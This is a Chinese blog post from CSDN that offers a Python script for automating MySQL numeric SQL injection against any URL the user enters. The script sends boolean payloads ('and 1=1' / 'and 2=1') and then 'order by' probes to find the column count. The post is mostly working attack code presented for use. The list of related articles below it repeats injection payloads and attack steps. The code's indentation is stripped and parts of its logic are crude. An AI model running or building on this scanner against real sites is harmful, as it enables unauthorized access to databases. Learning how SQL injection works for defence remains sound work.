mysql 数字注入_python打造一个Mysql数字类型注入脚本(1)

最新推荐文章于 2022-07-12 17:28:28 发布
最新推荐文章于 2022-07-12 17:28:28 发布
阅读量88 收藏 1
点赞数
文章标签: mysql 数字注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39874196/article/details/113596827
版权

前言:

总是想写一个sql注入脚本,但是之前的那些都不行。

这次做好了准备,然后嘿嘿嘿。

准备:

sql注入的基础知识

熟悉怎么判断

正文:

思路概念图:

这里我没有限制用户输入,不限制的话可能会 @@*#&@* = =

d8806ef8f5f02c8a8143f28cadf21a64.png

代码:

import requests

from bs4 import BeautifulSoup

import time

import re

import sys

def user():

wailtfor=input('请输入你要进行sql注入测试的url:')

print('------开启第一重验证------')

url="{}".format(wailtfor)

headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}

request=requests.get(url=url,headers=headers,timeout=6)

if request.status_code != 200:

print('[-]抱歉该url十分的不稳定,退出程序中......')

time.sleep(1)

sys.exit()

else:

print('[+]第一重验证已经完成,目标是稳定的')

journal=open('journal.txt','w',encoding='utf-8')

journal.write('{}是稳定的\n'.format(url))

journal.write('下一步进行判断是否存在注入')

journal.close()

print('------开启第二重测试------')

def ceshi():

pay1 = '%20and%201=1'

pay2 = '%20and%202=1'

Testinjection1 = request.url + pay1

Testinjection2=request.url+pay2

print('-------尝试数字型注入------')

print(Testinjection1)

print(Testinjection2)

Testg=requests.get(Testinjection1,headers=headers)

print(Testg.headers)

Testg2=requests.get(Testinjection2,headers=headers)

print(Testg2.headers)

if Testg.text != Testg2.text:

print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))

journal2 = open('journal.txt', 'a')

journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))

journal2.close()

print('------开始猜字段数------')

elif Testg.headers != Testg2.headers:

print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1,pay2),'可能存在注入点')

journal2=open('journal.txt','a')

journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1,pay2))

journal2.close()

print('------开始猜字段数------')

else:

print('[-]数字型注入失败')

print('[!]尝试字符型注入')

sys.exit()

a='ooo'

for s in range(1,100):

if a=='xxx':break

orpay=url+'%20order%20by%20{}'.format(s)

res=requests.get(orpay,headers=headers)

ewe=res.content

lk=re.finditer('mysql_fetch_array()',str(ewe))

for p in lk:

print(str(p))

g='''<_sre.sre_match object span="(232," match="mysql_fetch_array">'''

if str(p) == g:

print('字段数payload:', res.url)

dw = int(res.url[-1:])-1

print(type(dw))

print('字段数长度为:', dw)

a='xxx'

else:

print('字段数payload:',res.url)

dw=int(res.url[-1:])-1

print('字段数长度为:',dw)

a='xxx'

ceshi()

user()

测试结果如下:

2dbf379db0321fcd15a83be1b82fb82a.png

24a3c00be69be6dbda6016ca36d2712c.png

代码还有很多不足,诺各位大佬有什么好的意见请多多留言。 = =

最后送上一首歌:

weixin_39874196
关注
mysql.rar_MYSQL_python_python mysql_python数据库
09-21
首先,我们关注到“MySQLDB.py”,这通常是一个Python模块,它可能实现了PythonMySQL之间的连接和数据操作。MySQLDB是Python一个旧版库,用于连接MySQL数据库,它是Python DB-API(Database API Specification v...
Python脚本之操作MySQL【一】
zyooooxie的博客
01-04 751
Python操作MySQL-实际代码
mysql 联合查询 注入,Mysql 联合查询手工注入详解
weixin_35215045的博客
03-17 437
0x00 演示环境Windows 7 64位旗舰版PHPStudy测试环境:DownloadNavicat:Download代码编辑器(我用的Sublime Text3,也可以用Vscode或者notepad++等,具体资源可在网上找)以下配置步骤比较详细,大佬请直接跳过,导入数据库,编辑代码连接信息即可安装好PHPStudy后,将测试环境解压,sql.php置于phpstudy目录下的WWW文件...
mysql注入漏洞检查_Python-编写一个mysql注入漏洞检测工具
weixin_33610601的博客
02-28 166
判断mysql网站是否存在注入漏洞的几个方法:注入点后加上一个单引号会报错and 1=1返回正常页面,and 1=2返回的页面不同于正常页面and sleep(3) 网页会等待3秒左右根据返回的页面情况我们就能知道是否存在注入漏洞要获取页面返回的结果是不是一样的,我们可以通过获取请求头中的Content-Length的长度来判断知道这些后,我们就能来写个简单的python脚本# -*- codin...
python打造一个Mysql数字类型注入脚本(1)
weixin_30345055的博客
04-21 289
前言: 总是想写一个sql注入脚本,但是之前的那些都不行。 这次做好了准备,然后嘿嘿嘿。 准备: sql注入的基础知识 熟悉怎么判断 正文: 思路概念图: 这里我没有限制用户输入,不限制的话可能会 @&#@*#&@* = = 代码: import requests from bs4 import BeautifulSoup import time ...
【SQL注入数字型注入 & 字符型注入
07-12 2338
【SQL-数字&字符】
sql_CONNECT.zip_MYSQL_mysql python_python sql_python 数据库_python
09-24
在提供的压缩包子文件"sql_连接数据库.py"中,我们可以推测这是一个实际的Python脚本,它展示了如何使用Python连接到MySQL数据库。 现在,让我们详细讨论相关知识点: 1. **Python的数据库接口模块**:Python提供...
Mysql_python_MYSQL_
10-01
首先,为了在Python中与MySQL交互,我们需要一个名为`pymysql`的库。`pymysql`是Python连接MySQL数据库的标准库,它提供了连接、查询、事务处理等功能。你可以通过Python的包管理器pip来安装`pymysql`: ```bash ...
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
python mysql自增字段AUTO_INCREMENT值的修改方式
09-08
本文对如何在Python脚本中操作MySQL数据库以修改AUTO_INCREMENT值给出了全面的介绍,包括了连接数据库、查询当前自增值、修改自增值的方法,以及在Django框架中可能会遇到的一些相关问题的解决办法,是为数据库...
SQL注入基础--数字型注入
qq_42988351的博客
04-02 8166
参考 参考学习链接 学习笔记–基础篇–sql注入数字型) SQL注入简述 SQL注入,就是利用现有Web应用程序,构建特殊的参数输入,将(恶意的)SQL语句注入到后台数据库引擎,最终达到欺骗服务器执行恶意SQL语句的目的。 SQL注入的本质是后台SQL语句使用了拼接查询,未对用户输入的数据作安全处理。 SQL注入分类 根据注入形式的不同,可分为: 数字型注 字符型注 搜索型注入 根据请求方式的不同,可分为: GET型注 POST型注 HEADER型注入 根据注入点位置的不同,可分为: 列
注入中的数字型,字符型,搜索型的区别
热门推荐
CC's Blog
10-26 1万+
作者:幻泉 blog:http://hi.baidu.com/woshihuanquan/ 在数据库注入中经常有人说这个注入点为字符型的,那个注入点位数字型的,那么到底什么是数字型什么是字符型呢?其实所有的类型都是根据数据库本身表的类型所产生的,在我们创建表的时候会发现其后总有个数据类型的限制,而不同的数据库又有不同的数据类型。例如mssql就有很多自己的数据类型,但是无论
web渗透(asp数字型注入模拟实战)
云都小生
06-19 5129
昨晚花了一整晚的时间找一套没有防注入的网站源码,太难找了,今天六点多就起床,终于找到了。(原谅我笨) 打开虚拟机→打开asp小旋风→将网站程序放到asp小旋风下的wwwroot目录,打开网址http://127.0.0.1/,OK,能运行。 梳理一下注入的流程:查注入点→判断是否能注入→猜表段→猜字段→爆管理员账户密码 OK,往下走。 打开本地搭的站点→随便点看看哪里能
SQL数字型注入
kuiguowei的博客
01-12 9611
SQL注入攻击的产生 当应用程序使用输入内容来构造动态SQL语句以访问数据库时,会发生SQL注入攻击。 如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生SQL注入。 SQL注入可能导致攻击者使用应用程序登陆在数据库中执行命令。相关的SQL注入可以通过测试工具pangolin进行。如果应用程序使用特权过高的帐户连接到数据库,这种问题会变得很严重。在
SQL注入数字型注入实战案例详解
weixin_39096432的博客
12-15 1468
SQL注入数字型注入实战案例详解 ———— 97℃oldboy SQL注入种类多种多样,此文将通过一个实例详细讲解数字型注入。 在我们拿到一个网页时,首先判断它是否存在注入漏洞最简单粗暴的方法就是在参数后面加一个单引号,如果网页报错,那么说明有可能存在注入漏洞了。请看下面的网页操作: 上面是一个正常的网页,我们先检测网页是否有参数,在网址后面加上:?id=1 即http://192.168.114.147/sqli-labs-master/Less
sql 布尔盲注 python脚本实现
sophia9301的博客
10-12 7703
渣渣一枚,把学习sql注入过程中遇到的一些问题记录下来,以供日后参考。 按照网上教程注入时发现过滤了union = < > ,顿时就一脸懵逼,因为不会构造sql语句,更不会绕过,最后在师父的指导下,首先通过手工注入注入出了数据库名及长度。 1.数据库名长度: http://XXX.XXX.XX/sql.php? id=345’ and length(database()) like 1 an
***学习笔记--基础篇--sql注入数字型
weixin_34364071的博客
09-28 616
环境:dvwa 1.7数据库:mysql dvwa的安全等级:medium一、分析和查找注入点(1)知识点回顾如果上一篇有好好读过的同学应该知道,我们上一篇遇到的字符型注入。也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住。如果我们想要注入自己的payload(有效载荷)的话,则我们必须先闭合前面的单引号或者双引号,否则我们的数据始终会被...
数字型SQL注入学习
weixin_38608231的博客
08-08 5226
MYSQL为例子说明,SQL注入的形成原理是没有对用户输入的数据进行过滤和转义,使得用户的数据被SQL解释器执行。 数字型注入特征是当输入的参数为整型时,如:ID,年龄,页码等,若存在注入漏洞,则可认为是数字型注入数字型注入多存在ASP与PHP等弱类型中。 一、有回显的SQL注入(报错注入) 1.判断是否存在注入点 判断是否存在注入点最常见的做法是利用单引号,即“ ' ”。因为当你...
实验七:从一个数字型注入认识SQL
qq_44720671的博客
03-24 350
一个数字型注入认识SQL 如图,打开Pikachu中的数字型注入,页面中,让用户选择数字进行查询 我们可以查看后端源代码 由于代码中,是直接将id输入到select中,没有做任何防范,因此,我们可以利用burp suite工具,对代码进行修改 步骤 1、进行抓包,发送至repeater 2、将id=1改成id=1 or 1=1(注:并非一定要改成”or 1=1 “,只要是“为真”,都可以)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值